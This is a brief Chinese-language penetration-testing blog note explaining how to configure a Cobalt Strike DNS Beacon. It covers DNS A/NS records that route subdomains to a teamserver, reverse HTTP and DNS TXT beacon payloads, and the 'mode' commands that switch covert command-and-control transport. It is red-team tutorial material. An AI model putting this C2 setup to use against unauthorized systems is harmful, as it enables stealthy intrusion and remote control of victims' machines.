Cobalt Strike DNS Beacon

X1r0z included in Pentest
  About 300 words One minute 

通过添加 DNS Beacon 达到利用 DNS staging payload 的目的.

隐蔽性好, 但传输速度慢.

首先需要配置 A 记录指向 teamserver 的 IP (NS 记录的目标只能为域名).

之后配置 NS 记录 (名称任意 不必为其子域名) 指向 teamserver 所在域名.

1
2
3
4

malwarec2  A   192.168.1.1
profile    NS  malwarec2.exp10it.cn
games      NS  malwarec2.exp10it.cn
pictures   NS  malwarec2.exp10it.cn

添加 DNS Beacon, 这里以 windows/beacon_http/reverse_http 为例.

至此, 对 NS 域名及其子域的所有请求都将被发送至 teamserver 所在服务器.

1
2

request profile.exp10it.cn to malwarec2.exp10it.cn
request test.profile.exp10it.cn to malwarec2.exp10it.cn

在 cobalt strike 添加 DNS Beacon 后将会启动 DNS Server, 开放 53 端口, 注意防火墙设置.

除此之外还有 windows/beacon_dns/reverse_dns_txt, 该 payload 完全利用 DNS TXT 记录传输数据, 因此 Listener 的端口是非必需的, 但可能会有数以千计的 DNS 请求被发送.

在 interact 中使用 mode 命令切换传输模式.

1
2
3
4

mode http //switch to HTTP mode
mode dns // switch to DNS A mode
mode dns6 // switch to DNS AAAA mode
mode dns-txt //switch to DNS TXT mode
Updated on 2024-11-18 5a1a136
CC BY-NC-SA 4.0
Read Markdown
CobaltStrike
Back | Home
0%